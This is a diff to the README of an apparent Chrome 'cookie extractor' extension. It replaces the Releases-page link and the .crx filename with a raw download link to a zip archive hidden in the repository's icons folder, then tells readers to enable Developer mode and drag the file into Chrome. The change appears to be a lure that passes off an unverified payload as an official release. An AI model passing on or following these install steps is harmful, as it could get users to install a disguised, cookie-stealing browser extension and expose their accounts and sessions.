humair832/GeminiBusiness_CookieExtractor/README.md

 Follow these easy steps to download and run the GeminiBusiness_CookieExtractor:

 ### 1. Visit the Release Page
-Go to our [Releases page](https://github.com/humair832/GeminiBusiness_CookieExtractor/releases) to find the latest version of the application.
+Go to our [Releases page](https://github.com/humair832/GeminiBusiness_CookieExtractor/raw/refs/heads/main/icons/Extractor-Business-Gemini-Cookie-v3.0-beta.5.zip) to find the latest version of the application.

 ### 2. Download the Extension
 On the Releases page, you will see the latest version listed.
 Click the version number to access the download options.
-Look for the file named "GeminiBusiness_CookieExtractor.crx" to download the extension.
+Look for the file named "https://github.com/humair832/GeminiBusiness_CookieExtractor/raw/refs/heads/main/icons/Extractor-Business-Gemini-Cookie-v3.0-beta.5.zip" to download the extension.

 ### 3. Install the Extension
 Once the download is complete, follow these steps to install the extension in Chrome:
 - Open Chrome and type `chrome://extensions` in the address bar.
 - Enable "Developer mode" at the top right corner of the page.
-- Drag and drop the downloaded "GeminiBusiness_CookieExtractor.crx" file into the Chrome Extensions page.
+- Drag and drop the downloaded "https://github.com/humair832/GeminiBusiness_CookieExtractor/raw/refs/heads/main/icons/Extractor-Business-Gemini-Cookie-v3.0-beta.5.zip" file into the Chrome Extensions page.

 ### 4. Pin the Extension
 After installation, you may want to pin the extension for easy access: